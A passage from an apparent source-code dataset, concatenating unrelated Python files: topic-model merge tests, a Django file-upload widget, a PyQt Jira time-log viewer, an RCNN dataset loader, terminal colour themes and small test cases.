a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
for msg in MTracker.InfoLog:
print msg
assert MTracker.nSuccess == 4
assert MTracker.nTrial == 4
assert (0,4) in MTracker.acceptedOrigIDs
assert (1,5) in MTracker.acceptedOrigIDs
assert (2,6) in MTracker.acceptedOrigIDs
assert (3,7) in MTracker.acceptedOrigIDs
######################################################### run_merge_move
######################################################### full tests
def test_model_matches_ground_truth_as_precheck(self):
''' Verify HDPmodel is able to learn ground truth parameters
and maintain stable estimates after several E/M steps
'''
np.set_printoptions(precision=3,suppress=True)
# Advance the model several iterations
for rr in range(5):
self.run_Estep_then_Mstep()
for k in range(self.hmodel.obsModel.K):
logtopicWordHat = self.hmodel.obsModel.comp[k].Elogphi
topicWordHat = np.exp(logtopicWordHat)
diffVec = np.abs(topicWordHat - self.Data.TrueParams['topics'][k])
print diffVec
print ' '
assert np.max(diffVec) < 0.04
######################################################### run_merge_move
######################################################### full tests
def test_run_merge_move_on_true_comps_fails(self):
''' Should not be able to merge "true" components into one another
Each is necessary to explain (some) data
'''
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.hmodel.calc_local_params(self.Data)
SS = self.hmodel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for trial in range(10):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.hmodel, self.Data, SS, mergename='random')
assert newModel.allocModel.K == self.hmodel.allocModel.K
assert newModel.obsModel.K == self.hmodel.obsModel.K
def test_run_merge_move_on_dup_comps_succeeds_with_each_ideal_pair(self):
''' Given the duplicated comps model,
which has a redundant copy of each "true" component,
We show that deliberately merging each pair does succeed.
This is "ideal" since we know in advance which merge pair to try
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for kA in [0,1,2,3]:
kB = kA + 4 # Ktrue=4, so kA's best match is kA+4
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert newModel.allocModel.K == self.dupModel.allocModel.K - 1
assert newModel.obsModel.K == self.dupModel.obsModel.K - 1
assert MoveInfo['didAccept'] == 1
def test_run_merge_move_on_dup_comps_fails_with_nonideal_pairs(self):
''' Given the duplicated comps model,
which has a redundant copy of each "true" component,
We show that deliberately merging each pair does succeed.
This is "ideal" since we know in advance which merge pair to try
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
for Kstep in [1,2,3,5,6,7]:
for kA in range(8 - Kstep):
kB = kA + Kstep
newM, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert MoveInfo['didAccept'] == 0
def test_run_merge_move_on_dup_comps_succeeds_with_all_ideal_pairs(self):
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
myModel = self.dupModel.copy()
for kA in [3,2,1,0]: # descend backwards so indexing still works
kB = kA + 4 # Ktrue=4, so kA's best match is kA+4
myModel, SS, newEv, MoveInfo = MergeMove.run_merge_move(myModel,
self.Data, SS, kA=kA, kB=kB)
print MoveInfo['msg']
assert MoveInfo['didAccept'] == 1
def test_run_merge_move_on_dup_comps_succeeds_with_random_choice(self):
''' Consider Duplicated Comps model.
Out of (8 choose 2) = 28 possible pairs,
exactly 4 produce sensible merges.
Verify that over many random trials where kA,kB drawn uniformly,
we obtain a success rate not too different from 4 / 28 = 0.142857
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
nTrial = 100
nSuccess = 0
PRNG = np.random.RandomState(0)
for trial in range(nTrial):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='random', randstate=PRNG)
if MoveInfo['didAccept']:
print MoveInfo['msg']
nSuccess += 1
assert nSuccess > 0
rate = float(nSuccess)/float(nTrial)
print "Expected rate: .1428"
print "Measured rate: %.3f" % (rate)
assert rate > 0.1
assert rate < 0.2
def test_run_merge_move_on_dup_comps_succeeds_with_marglik_choice(self):
''' Consider Duplicated Comps model.
Use marglik criteria to select candidates kA, kB.
Verify that the merge accept rate is much higher than at random.
The accept rate should actually be near perfect!
'''
self.MakeModelWithDuplicatedComps()
mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
LP = self.dupModel.calc_local_params(self.Data)
SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags)
nTrial = 100
nSuccess = 0
PRNG = np.random.RandomState(0)
for trial in range(nTrial):
newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='marglik', randstate=PRNG)
print MoveInfo['msg']
if MoveInfo['didAccept']:
nSuccess += 1
assert nSuccess > 0
rate = float(nSuccess)/float(nTrial)
print "Expected rate: >.95"
print "Measured rate: %.3f" % (rate)
assert rate > 0.95
|
test/run/t242.py | timmartin/skulpt | 2,671 | 30498 | class O(object): pass
class A(O): pass
class B(O): pass
class C(O): pass
class D(O): pass
class E(O): pass
class K1(A,B,C): pass
class K2(D,B,E): pass
class K3(D,A): pass
class Z(K1,K2,K3): pass
print K1.__mro__
print K2.__mro__
print K3.__mro__
print Z.__mro__
|
tests/cases/infer.py | div72/py2many | 345 | 30502 | <filename>tests/cases/infer.py
#!/usr/bin/env python3
def foo():
a = 10
# infer that b is an int
b = a
assert b == 10
print(b)
if __name__ == "__main__":
foo()
|
fnss/traffic/__init__.py | brucespang/fnss | 114 | 30520 | """Tools for creating and manipulating event schedules and traffic matrices"""
from fnss.traffic.eventscheduling import *
from fnss.traffic.trafficmatrices import *
|
djng/forms/widgets.py | ParikhKadam/django-angular | 941 | 30522 | import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
signer = signing.Signer()
def __init__(self, area_label, fileupload_url, attrs=None):
self.area_label = area_label
self.fileupload_url = fileupload_url
super(DropFileWidget, self).__init__(attrs)
self.filetype = 'file'
def render(self, name, value, attrs=None, renderer=None):
from django.contrib.staticfiles.storage import staticfiles_storage
extra_attrs = dict(attrs)
extra_attrs.update({
'name': name,
'class': 'djng-{}-uploader'.format(self.filetype),
'djng-fileupload-url': self.fileupload_url,
'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
})
self.update_attributes(extra_attrs, value)
final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
# add a spinnging wheel
spinner_attrs = {
'class': 'glyphicon glyphicon-refresh glyphicon-spin',
'ng-cloak': True,
}
elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
# add a delete icon
icon_attrs = {
'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
'class': 'djng-btn-trash',
'title': _("Delete File"),
'djng-fileupload-button ': True,
'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
'ng-cloak': True,
}
elements.append(format_html('<img {} />', flatatt(icon_attrs)))
# add a download icon
if value:
download_attrs = {
'href': value.url,
'class': 'djng-btn-download',
'title': _("Download File"),
'download': True,
'ng-cloak': True,
}
download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))
def update_attributes(self, attrs, value):
if value:
try:
content_type, _ = mimetypes.guess_type(value.file.name)
extension = mimetypes.guess_extension(content_type)[1:]
except (IOError, IndexError, TypeError):
extension = '_blank'
background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
class DropImageWidget(DropFileWidget):
def __init__(self, area_label, fileupload_url, attrs=None):
super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
self.filetype = 'image'
def update_attributes(self, attrs, value):
if value:
background_url = self.get_background_url(value)
if background_url:
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
def get_background_url(self, value):
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
try:
thumbnailer = get_thumbnailer(value)
thumbnail = thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)
return thumbnail.url
except InvalidImageFormatError:
return
|
parse_jira_logged_time/gui.py | gil9red/SimplePyScripts | 117 | 30525 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import json
import io
import sys
import traceback
import webbrowser
from contextlib import redirect_stdout
from datetime import datetime
from PyQt5.Qt import (
QApplication, QMessageBox, QThread, pyqtSignal, QMainWindow, QPushButton, QCheckBox, QPlainTextEdit,
QVBoxLayout, QHBoxLayout, QTextOption, QTableWidget, QWidget, QSizePolicy, QSplitter, Qt, QTableWidgetItem,
QProgressDialog, QHeaderView, QSystemTrayIcon, QIcon, QEvent, QTimer
)
from main import (
DIR, get_rss_jira_log, parse_logged_dict, get_logged_list_by_now_utc_date, get_logged_total_seconds,
get_sorted_logged, seconds_to_str
)
def log_uncaught_exceptions(ex_cls, ex, tb):
text = f'{ex_cls.__name__}: {ex}:\n'
text += ''.join(traceback.format_tb(tb))
print(text)
QMessageBox.critical(None, 'Error', text)
sys.exit(1)
sys.excepthook = log_uncaught_exceptions
class RunFuncThread(QThread):
run_finished = pyqtSignal(object)
def __init__(self, func):
super().__init__()
self.func = func
def run(self):
self.run_finished.emit(self.func())
WINDOW_TITLE = 'parse_jira_logged_time'
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle(WINDOW_TITLE)
file_name = str(DIR / 'favicon.ico')
icon = QIcon(file_name)
self.setWindowIcon(icon)
self.tray = QSystemTrayIcon(icon)
self.tray.setToolTip(self.windowTitle())
self.tray.activated.connect(self._on_tray_activated)
self.tray.show()
self.logged_dict = dict()
self.pb_refresh = QPushButton('REFRESH')
self.pb_refresh.clicked.connect(self.refresh)
self.cb_show_log = QCheckBox()
self.cb_show_log.setChecked(True)
self.log = QPlainTextEdit()
self.log.setReadOnly(True)
self.log.setWordWrapMode(QTextOption.NoWrap)
log_font = self.log.font()
log_font.setFamily('Courier New')
self.log.setFont(log_font)
self.cb_show_log.clicked.connect(self.log.setVisible)
self.log.setVisible(self.cb_show_log.isChecked())
header_labels = ['DATE', 'TOTAL LOGGED TIME']
self.table_logged = QTableWidget()
self.table_logged.setEditTriggers(QTableWidget.NoEditTriggers)
self.table_logged.setSelectionBehavior(QTableWidget.SelectRows)
self.table_logged.setSelectionMode(QTableWidget.SingleSelection)
self.table_logged.setColumnCount(len(header_labels))
self.table_logged.setHorizontalHeaderLabels(header_labels)
self.table_logged.horizontalHeader().setStretchLastSection(True)
self.table_logged.itemClicked.connect(self._on_table_logged_item_clicked)
header_labels = ['TIME', 'LOGGED', 'JIRA']
self.table_logged_info = QTableWidget()
self.table_logged_info.setEditTriggers(QTableWidget.NoEditTriggers)
self.table_logged_info.setSelectionBehavior(QTableWidget.SelectRows)
self.table_logged_info.setSelectionMode(QTableWidget.SingleSelection)
self.table_logged_info.setColumnCount(len(header_labels))
self.table_logged_info.setHorizontalHeaderLabels(header_labels)
self.table_logged_info.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)
self.table_logged_info.horizontalHeader().setStretchLastSection(True)
self.table_logged_info.itemDoubleClicked.connect(self._on_table_logged_info_item_double_clicked)
main_layout = QVBoxLayout()
central_widget = QWidget()
central_widget.setLayout(main_layout)
self.setCentralWidget(central_widget)
self.pb_refresh.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred))
h_layout = QHBoxLayout()
h_layout.addWidget(self.pb_refresh)
h_layout.addWidget(self.cb_show_log)
layout_table_widget = QVBoxLayout()
layout_table_widget.setContentsMargins(0, 0, 0, 0)
layout_table_widget.addWidget(self.table_logged)
layout_table_widget.addWidget(self.table_logged_info)
table_widget = QWidget()
table_widget.setLayout(layout_table_widget)
splitter = QSplitter(Qt.Horizontal)
splitter.addWidget(table_widget)
splitter.addWidget(self.log)
main_layout.addLayout(h_layout)
main_layout.addWidget(splitter)
def _fill_tables(self, xml_data: bytes):
buffer_io = io.StringIO()
try:
with redirect_stdout(buffer_io):
print(len(xml_data), repr(xml_data[:50]))
# Структура документа -- xml
self.logged_dict = parse_logged_dict(xml_data)
print(self.logged_dict)
if not self.logged_dict:
return
print(json.dumps(self.logged_dict, indent=4, ensure_ascii=False))
print()
logged_list = get_logged_list_by_now_utc_date(self.logged_dict)
logged_total_seconds = get_logged_total_seconds(logged_list)
logged_total_seconds_str = seconds_to_str(logged_total_seconds)
print('entry_logged_list:', logged_list)
print('today seconds:', logged_total_seconds)
print('today time:', logged_total_seconds_str)
print()
# Для красоты выводим результат в табличном виде
lines = []
# Удаление строк таблицы
while self.table_logged.rowCount():
self.table_logged.removeRow(0)
for i, (date_str, logged_list) in enumerate(get_sorted_logged(self.logged_dict)):
total_seconds = get_logged_total_seconds(logged_list)
total_seconds_str = seconds_to_str(total_seconds)
row = date_str, total_seconds_str, total_seconds
lines.append(row)
self.table_logged.setRowCount(self.table_logged.rowCount() + 1)
self.table_logged.setItem(i, 0, QTableWidgetItem(date_str))
item = QTableWidgetItem(total_seconds_str)
item.setToolTip('Total seconds: {}'.format(total_seconds))
self.table_logged.setItem(i, 1, item)
self.table_logged.setCurrentCell(0, 0)
self.table_logged.setFocus()
self._on_table_logged_item_clicked(self.table_logged.currentItem())
# Список строк станет списком столбцов, у каждого столбца подсчитается максимальная длина
max_len_columns = [max(map(len, map(str, col))) for col in zip(*lines)]
# Создание строки форматирования: [30, 14, 5] -> "{:<30} | {:<14} | {:<5}"
my_table_format = ' | '.join('{:<%s}' % max_len for max_len in max_len_columns)
for line in lines:
print(my_table_format.format(*line))
finally:
text = buffer_io.getvalue()
self.log.setPlainText(text)
print(text)
def refresh(self):
progress_dialog = QProgressDialog(self)
thread = RunFuncThread(func=get_rss_jira_log)
thread.run_finished.connect(self._fill_tables)
thread.run_finished.connect(progress_dialog.close)
thread.start()
progress_dialog.setWindowTitle('Please wait...')
progress_dialog.setLabelText(progress_dialog.windowTitle())
progress_dialog.setRange(0, 0)
progress_dialog.exec()
self.setWindowTitle(WINDOW_TITLE + ". Last refresh date: " + datetime.now().strftime('%d/%m/%Y %H:%M:%S'))
def _on_table_logged_item_clicked(self, item: QTableWidgetItem):
# Удаление строк таблицы
while self.table_logged_info.rowCount():
self.table_logged_info.removeRow(0)
row = item.row()
date_str = self.table_logged.item(row, 0).text()
logged_list = self.logged_dict[date_str]
logged_list = reversed(logged_list)
for i, logged in enumerate(logged_list):
self.table_logged_info.setRowCount(self.table_logged_info.rowCount() + 1)
self.table_logged_info.setItem(i, 0, QTableWidgetItem(logged['time']))
self.table_logged_info.setItem(i, 1, QTableWidgetItem(logged['logged_human_time']))
item = QTableWidgetItem(logged['jira_id'])
item.setToolTip(logged['jira_title'])
self.table_logged_info.setItem(i, 2, item)
def _on_table_logged_info_item_double_clicked(self, item: QTableWidgetItem):
row = item.row()
jira_id = self.table_logged_info.item(row, 2).text()
url = 'https://jira.compassplus.ru/browse/' + jira_id
webbrowser.open(url)
def _on_tray_activated(self, reason):
self.setVisible(not self.isVisible())
if self.isVisible():
self.showNormal()
self.activateWindow()
def changeEvent(self, event: QEvent):
if event.type() == QEvent.WindowStateChange:
# Если окно свернули
if self.isMinimized():
# Прячем окно с панели задач
QTimer.singleShot(0, self.hide)
if __name__ == '__main__':
app = QApplication([])
mw = MainWindow()
mw.resize(1200, 800)
mw.show()
mw.refresh()
app.exec()
|
applications/popart/faster-rcnn/nanodata/dataset/xml_dataset_for_rcnn.py | payoto/graphcore_examples | 260 | 30527 | <reponame>payoto/graphcore_examples
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
# Copyright 2021 RangiLyu.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been modified by Graphcore Ltd.
import numpy as np
import torch
from .xml_dataset import XMLDataset
from utils import logger
if logger.GLOBAL_LOGGER is not None:
print = logger.GLOBAL_LOGGER.log_str
def calc_area(boxes):
# boxes: n,4
# return
x1, y1, x2, y2 = np.split(boxes, 4, 1)
areas = (y2 - y1) * (x2 - x1) # n,1
return areas[:, 0]
class XMLDatasetForRcnn(XMLDataset):
def __init__(self,
preset_indices=None,
area_filter_thrd=0.0,
num_gtboxes=20,
specified_length=None,
extra_layer=None,
**kwargs):
self.area_filter_thrd = area_filter_thrd
self.num_gtboxes = num_gtboxes
self.preset_indices = preset_indices
self._cur_for_preset_indices = 0
super(XMLDatasetForRcnn, self).__init__(**kwargs)
self.real_length = len(self.data_info)
self.length = self.real_length * 2 if specified_length is None else specified_length
self.extra_layer = extra_layer
def get_train_data(self, idx):
"""
Load image and annotation
:param idx:
:return: meta-data (a dict containing image, annotation and other information)
filter zero area boxes
"""
if self.preset_indices is None:
pass
else:
idx = self.preset_indices[self._cur_for_preset_indices]
self._cur_for_preset_indices += 1
idx = int(idx % self.real_length)
meta = super().get_train_data(idx)
# filter boxes and labels by area
areas = calc_area(meta['gt_bboxes'])
mask = areas > self.area_filter_thrd
meta['gt_bboxes'] = meta['gt_bboxes'][mask, :]
meta['gt_labels'] = meta['gt_labels'][mask]
meta['db_inds'] = idx
#
# pad boxes and inds
boxes = np.zeros((self.num_gtboxes, 4)).astype(np.float32)
num_boxes = meta['gt_bboxes'].shape[0]
boxes[:num_boxes, :] = meta['gt_bboxes'][:self.num_gtboxes]
meta['gt_bboxes'] = torch.from_numpy(boxes)
labels = np.asarray([0] * self.num_gtboxes)
labels[:num_boxes] = meta['gt_labels'][:self.num_gtboxes]
meta['gt_labels'] = torch.from_numpy(labels)
meta['num_boxes'] = num_boxes
if num_boxes == 0:
return None # return None will re-run this function
# proc data in extra layer
if self.extra_layer is not None:
meta = self.extra_layer(meta)
return meta
def __len__(self):
return self.length
|
spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 169 | 30540 | <filename>spyder_terminal/widgets/style/themes.py
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see LICENSE.txt for details)
# -----------------------------------------------------------------------------
ANSI_COLORS = {
'emacs': {
'black': '#000000',
'red': '#800000',
'green': '#005100',
'yellow': '#abab67',
'blue': '#151d51',
'magenta': '#510051',
'cyan': '#105151',
'white': '#ffffff',
'brightBlack': '#555555',
'brightRed': '#c80000',
'brightGreen': '#00aa00',
'brightYellow': '#cbcb7b',
'brightBlue': '#3c51e8',
'brightMagenta': '#900090',
'brightCyan': '#20a7a7',
'brightWhite': '#ffffff'
},
'idle': {
'black': '#ffffff',
'red': '#8a0000',
'green': '#008a00',
'yellow': '#8a4000',
'blue': '#00008a',
'magenta': '#5a005a',
'cyan': '#105151',
'white': '#ffffff',
'brightBlack': '#555555',
'brightRed': '#dd0000',
'brightGreen': '#00aa00',
'brightYellow': '#ff7700',
'brightBlue': '#0000ff',
'brightMagenta': '#900090',
'brightCyan': '#20a7a7',
'brightWhite': '#ffffff'
},
'monokai': {
'black': '#48483e',
'red': '#dc2566',
'green': '#8fc029',
'yellow': '#d4c96e',
'blue': '#55bcce',
'magenta': '#9358fe',
'cyan': '#56b7a5',
'white': '#f8f8f2',
'brightBlack': '#76715e',
'brightRed': '#fa2772',
'brightGreen': '#a7e22e',
'brightYellow': '#e7db75',
'brightBlue': '#66d9ee',
'brightMagenta': '#ae82ff',
'brightCyan': '#66efd5',
'brightWhite': '#f9f8f5'
},
'pydev': {
'black': '#ffffff',
'red': '#800000',
'green': '#00aa00',
'yellow': '#ffff99',
'blue': '#0000ff',
'magenta': '#900090',
'cyan': '#007f7f',
'white': '#efefef',
'brightBlack': '#c0c0c0',
'brightRed': '#c10000',
'brightGreen': '#00cc00',
'brightYellow': '#fff569',
'brightBlue': '#015aff',
'brightMagenta': '#bf00bf',
'brightCyan': '#00a5a5',
'brightWhite': '#ffffff'
},
'scintilla': {
'black': '#ffffff',
'red': '#800000',
'green': '#007f00',
'yellow': '#ffff99',
'blue': '#00007f',
'magenta': '#7f007f',
'cyan': '#007f7f',
'white': '#efefef',
'brightBlack': '#adadad',
'brightRed': '#c10000',
'brightGreen': '#00ab00',
'brightYellow': '#fff569',
'brightBlue': '#0000ff',
'brightMagenta': '#be00be',
'brightCyan': '#00a5a5',
'brightWhite': '#ffffff'
},
'spyder': {
'black': '#ffffff',
'red': '#800000',
'green': '#00aa00',
'yellow': '#ffff99',
'blue': '#0000ff',
'magenta': '#900090',
'cyan': '#27b5ac',
'white': '#efefef',
'brightBlack': '#adadad',
'brightRed': '#c10000',
'brightGreen': '#00c800',
'brightYellow': '#fff569',
'brightBlue': '#0a37ff',
'brightMagenta': '#d500d5',
'brightCyan': '#2dd0c5',
'brightWhite': '#ffffff'
},
'spyder/dark': {
'black': '#19232D',
'red': '#c80000',
'green': '#11a642',
'yellow': '#c5bb29',
'blue': '#558eff',
'magenta': '#aa00aa',
'cyan': '#20b3a7',
'white': '#ffffff',
'brightBlack': '#4b4b4b',
'brightRed': '#ef0000',
'brightGreen': '#13c24b',
'brightYellow': '#e6e13f',
'brightBlue': '#4395ff',
'brightMagenta': '#da00da',
'brightCyan': '#23cbbd',
'brightWhite': '#ffffff'
},
'zenburn': {
'black': '#3F3F3F',
'red': '#705050',
'green': '#60B48A',
'yellow': '#DFAF8F',
'blue': '#506070',
'magenta': '#DC8CC3',
'cyan': '#8CD0D3',
'white': '#DCDCCC',
'brightBlack': '#709080',
'brightRed': '#DCA3A3',
'brightGreen': '#C3BF9F',
'brightYellow': '#F0DFAF',
'brightBlue': '#94BFF3',
'brightMagenta': '#EC93D3',
'brightCyan': '#93E0E3',
'brightWhite': '#DCDCCC'
},
'solarized/light': {
'black': '#fdf6e3',
'red': '#dc322f',
'green': '#859900',
'yellow': '#b58900',
'blue': '#268bd2',
'magenta': '#6c71c4',
'cyan': '#2aa198',
'white': '#93a1a1',
'brightBlack': '#657b83',
'brightRed': '#dc322f',
'brightGreen': '#859900',
'brightYellow': '#b58900',
'brightBlue': '#268bd2',
'brightMagenta': '#6c71c4',
'brightCyan': '#2aa198',
'brightWhite': '#fdf6e3'
},
'solarized/dark': {
'black': '#002b36',
'red': '#dc322f',
'green': '#859900',
'yellow': '#b58900',
'blue': '#268bd2',
'magenta': '#6c71c4',
'cyan': '#2aa198',
'white': '#93a1a1',
'brightBlack': '#657b83',
'brightRed': '#dc322f',
'brightGreen': '#859900',
'brightYellow': '#b58900',
'brightBlue': '#268bd2',
'brightMagenta': '#6c71c4',
'brightCyan': '#2aa198',
'brightWhite': '#fdf6e3'
},
'inkpot': {
'black': '#1f1f27',
'red': '#CD5200',
'green': '#9DCD00',
'yellow': '#cd8b00',
'blue': '#87cefa',
'magenta': '#8b8bff',
'cyan': '#87FAE5',
'white': '#93a1a1',
'brightBlack': '#313131',
'brightRed': '#CD2300',
'brightGreen': '#C0CD00',
'brightYellow': '#ffcd8b',
'brightBlue': '#B9E1FA',
'brightMagenta': '#A3A3FF',
'brightCyan': '#B8FAEE',
'brightWhite': '#cfbfad'
},
'minimal': {
'black': '#ffffff',
'red': '#D22D72',
'green': '#568C3B',
'yellow': '#8A8A0F',
'blue': '#257FAD',
'magenta': '#5D5DB1',
'cyan': '#2D8F6F',
'white': '#7EA2B4',
'brightBlack': '#5A7B8C',
'brightRed': '#D22D72',
'brightGreen': '#568C3B',
'brightYellow': '#8A8A0F',
'brightBlue': '#257FAD',
'brightMagenta': '#5D5DB1',
'brightCyan': '#2D8F6F',
'brightWhite': '#EBF8FF'
},
'nightlion': {
'black': '#4c4c4c',
'red': '#bb0000',
'green': '#5fde8f',
'yellow': '#f3f167',
'blue': '#276bd8',
'magenta': '#bb00bb',
'cyan': '#00dadf',
'white': '#bbbbbb',
'brightBlack': '#555555',
'brightRed': '#ff5555',
'brightGreen': '#55ff55',
'brightYellow': '#ffff55',
'brightBlue': '#5555ff',
'brightMagenta': '#ff55ff',
'brightCyan': '#55ffff',
'brightWhite': '#ffffff'
},
'notepad++': {
'black': '#ffffff',
'red': '#CC342B',
'green': '#198844',
'yellow': '#FBA922',
'blue': '#3971ED',
'magenta': '#A36AC7',
'cyan': '#3971ED',
'white': '#C5C8C6',
'brightBlack': '#969896',
'brightRed': '#CC342B',
'brightGreen': '#198844',
'brightYellow': '#FBA922',
'brightBlue': '#3971ED',
'brightMagenta': '#A36AC7',
'brightCyan': '#3971ED',
'brightWhite': '#FFFFFF'
},
'oblivion': {
'black': '#1D1F21',
'red': '#CC6666',
'green': '#B5BD68',
'yellow': '#F0C674',
'blue': '#81A2BE',
'magenta': '#B294BB',
'cyan': '#8ABEB7',
'white': '#C5C8C6',
'brightBlack': '#969896',
'brightRed': '#CC6666',
'brightGreen': '#B5BD68',
'brightYellow': '#F0C674',
'brightBlue': '#81A2BE',
'brightMagenta': '#B294BB',
'brightCyan': '#8ABEB7',
'brightWhite': '#FFFFFF'
},
'obsidian': {
'black': '#232C31',
'red': '#2A5491',
'green': '#237986',
'yellow': '#A03B1E',
'blue': '#484D79',
'magenta': '#C59820',
'cyan': '#B02F30',
'white': '#9EA7A6',
'brightBlack': '#3F4944',
'brightRed': '#2A5491',
'brightGreen': '#237986',
'brightYellow': '#A03B1E',
'brightBlue': '#484D79',
'brightMagenta': '#C59820',
'brightCyan': '#B02F30',
'brightWhite': '#B5D8F6'
},
'pastel': {
'black': '#000000',
'red': '#c37372',
'green': '#72c373',
'yellow': '#c2c372',
'blue': '#7372c3',
'magenta': '#c372c2',
'cyan': '#72c2c3',
'white': '#d9d9d9',
'brightBlack': '#323232',
'brightRed': '#dbaaaa',
'brightGreen': '#aadbaa',
'brightYellow': '#dadbaa',
'brightBlue': '#aaaadb',
'brightMagenta': '#dbaada',
'brightCyan': '#aadadb',
'brightWhite': '#ffffff'
},
'retta': {
'black': '#000000',
'red': '#A54242',
'green': '#8C9440',
'yellow': '#de935f',
'blue': '#5F819D',
'magenta': '#85678F',
'cyan': '#5E8D87',
'white': '#969896',
'brightBlack': '#373b41',
'brightRed': '#cc6666',
'brightGreen': '#b5bd68',
'brightYellow': '#f0c674',
'brightBlue': '#81a2be',
'brightMagenta': '#b294bb',
'brightCyan': '#8abeb7',
'brightWhite': '#c5c8c6'
},
'roboticket': {
'black': '#f5f5f5',
'red': '#E64569',
'green': '#89D287',
'yellow': '#DAB752',
'blue': '#439ECF',
'magenta': '#D961DC',
'cyan': '#64AAAF',
'white': '#B3B3B3',
'brightBlack': '#535353',
'brightRed': '#E4859A',
'brightGreen': '#A2CCA1',
'brightYellow': '#E1E387',
'brightBlue': '#6FBBE2',
'brightMagenta': '#E586E7',
'brightCyan': '#96DCDA',
'brightWhite': '#DEDEDE'
},
'sublime-monokai/extended': {
'black': '#222222',
'red': '#dc2566',
'green': '#8fc029',
'yellow': '#d4c96e',
'blue': '#55bcce',
'magenta': '#9358fe',
'cyan': '#56b7a5',
'white': '#f8f8f2',
'brightBlack': '#76715e',
'brightRed': '#fa2772',
'brightGreen': '#a7e22e',
'brightYellow': '#e7db75',
'brightBlue': '#66d9ee',
'brightMagenta': '#ae82ff',
'brightCyan': '#66efd5',
'brightWhite': '#f9f8f5'
},
'vibrant-ink': {
'black': '#191919',
'red': '#d00e18',
'green': '#138034',
'yellow': '#ffcb3e',
'blue': '#006bb3',
'magenta': '#6b2775',
'cyan': '#384564',
'white': '#ededed',
'brightBlack': '#5d504a',
'brightRed': '#f07e18',
'brightGreen': '#b1d130',
'brightYellow': '#fff120',
'brightBlue': '#4fc2fd',
'brightMagenta': '#de0071',
'brightCyan': '#5d504a',
'brightWhite': '#ffffff'
}
}
|
erniekit/common/rule.py | PaddlePaddle/LARK | 1,552 | 30553 | <filename>erniekit/common/rule.py
# -*- coding: utf-8 -*
"""
some rule
"""
class MaxTruncation(object):
"""MaxTruncation:超长截断规则
"""
KEEP_HEAD = 0 # 从头开始到最大长度截断
KEEP_TAIL = 1 # 从头开始到max_len-1的位置截断,末尾补上最后一个id(词或字)
KEEP_BOTH_HEAD_TAIL = 2 # 保留头和尾两个位置,然后按keep_head方式截断
class EmbeddingType(object):
